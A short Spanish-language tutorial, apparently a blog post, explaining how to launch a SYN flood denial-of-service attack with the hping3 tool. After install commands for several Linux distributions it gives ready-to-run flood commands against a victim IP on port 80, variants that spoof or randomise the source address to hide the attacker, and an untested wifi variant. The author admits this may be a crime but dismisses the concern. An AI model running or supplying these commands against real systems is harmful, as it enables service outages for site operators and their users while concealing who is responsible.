SYN Flood Attack (DD0S) usando hping
HPing es una herramienta en linea de comandos que nos permite crear y analizar paquetes TCP/IP, y como tal tiene un muchas utilidades: hacer testing de firewalls, escaneo de puertos, redes y como no… también tiene la capacidad de provocar un SYN Flood Attack (DD0S).
El objetivo de un ataque de este tipo es el envío de peticiones de conexión TCP más rápido de lo que una máquina puede procesar, al fin de saturar los recursos y evitar que la máquina pueda aceptar más conexiones.
Para instalar la ultima versión de hping dependiendo de la distribucion que usemos haríamos:
- En Debian y derivadas como Ubuntu y Linux Mint.
sudo apt-get install hping3
- En Fedora
yum install hping3
- En openSUSE
zypper install hping3
Un ataque clásico de DDoS sería el siguiente
sudo hping3 -p 80 -S --flood ip_victima
donde :
-p 80 es el puerto que elegimos atacar
-S activa el flag Syn
--flood le indica a hping que envie los paquetes a la máxima velocidad posible
ip_victima es la ip o dominio a atacar
Si queremos que nuestra ip no sea visible podemos añadirle la opción -a y la ip que vamos a falsear
sudo hping3 -a ip_falsa -p 80 -S --flood ip_victima
o bien utilizar --rand-source con lo que se generan direcciones de origen ip al azar
esto puede ser un delito y ustedes puden ser acusados por la comunidad como lamer pero el conocimiento es libre y podemos aser lo que se no de la gana con el .
comando experimental no usarlo aun no lo pruevo este es para ataques con wifi
(sudo hping3 --flood -i wlan0 -s -p 80 --rand-source y la ip a atacar)